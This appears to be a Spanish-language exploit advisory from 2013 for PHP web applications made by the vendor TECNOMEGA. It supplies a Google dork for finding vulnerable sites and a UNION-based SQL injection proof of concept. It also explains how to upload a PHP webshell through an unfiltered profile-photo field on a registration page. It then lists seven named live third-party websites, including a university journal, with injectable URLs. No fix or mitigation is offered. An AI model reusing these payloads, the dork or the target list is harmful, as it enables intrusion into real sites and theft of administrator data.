Archivo de la etiqueta: tecnomega

TECNOMEGA / SQL Injection vulnerability & Shell Upload

# Exploit Title: TECNOMEGA / SQL Injection vulnerability & Shell Upload
# Date: 21/02/2013
# Exploit Author: Diego_Asencio || r4z0r_bl4ck
# Twitter: @r4z0r_bl4ck
# Blog: https://r4z0rbl4ck.wordpress.com/
# Vendor Homepage: http://www.tecnomega.net/
# Tested on: Linux Ubuntu
# Categoria: WebApps – PHP
# Google Dork: inurl:.php?id= intext:Desarrollado por TECNOMEGA || inurl:registrarme.php intext:Desarrolado por TECNOMEGA
# WorkGroup: @inside0utside

-= INFORMACION =-

La Empresa Digital TECNOMEGA desarrolla aplicaciones web en lenguaje PHP, en el cual no tienen en cuenta el filtrado de variables, ni el filtrado de extenciones de archivos en los ‘uploads’ o subidores de archivos, permitiendo a un atacante subir su phpshell por medio de un formulario de registro de usuario normal, o realizando la inyeccion de SQL para obtener los datos del usuario administrador

-= MYSQL ERROR =-

Error
SELECT * FROM productos WHERE marca=’1” AND estado=’1′ ORDER BY nombre ASC limit 0,16
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘1’ ORDER BY nombre ASC limit 0,16′ at line 1

-= XPL (PoC) =-

1) => http://127.0.0.1/*.php?id=1+union+all+select+0,1,2,3,4– [SQL Injection]

2) => http://127.0.0.1/registrarme.php [Shell Upload]

-= DEMO’s =-

http://itouch.com.co/detalle-accesorio.php?id=362 (SQLi)
http://www.revistacolombianadesaludocupacional.co/autor-detalle.php?id=49 (SQLi)
http://tecnomega.net/productos-marcas.php?id=15 (SQLi)
http://www.unilibrecali.edu.co/Revista_Colombiana_Salud_Ocupacional/autor-detalle.php?id=42 (SQLi)
http://dkrinmobiliaria.com/detalle_inmueble.php?id=36 (SQLi)
http://megatec.com.co/noticias.php?id=9 (SQLi)
http://www.computiendaelectronica.com/detalle_producto.php?id=189 (SQLi)

=> Asi Mismo, para subir shell el dominio seria el mismo, pero con el directorio /registrarme.php donde en el campo para subir la foto de perfil, se colara la WebShell en el servidor por no filtrar extenciones en los formularios de uploads

#################################
Agradecimientos a:

@inside0utside – t34m /
– all members

@R4z0r_Bl4ck
@Sr_Xaoc
@MaximusWell
@MikeSoft
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-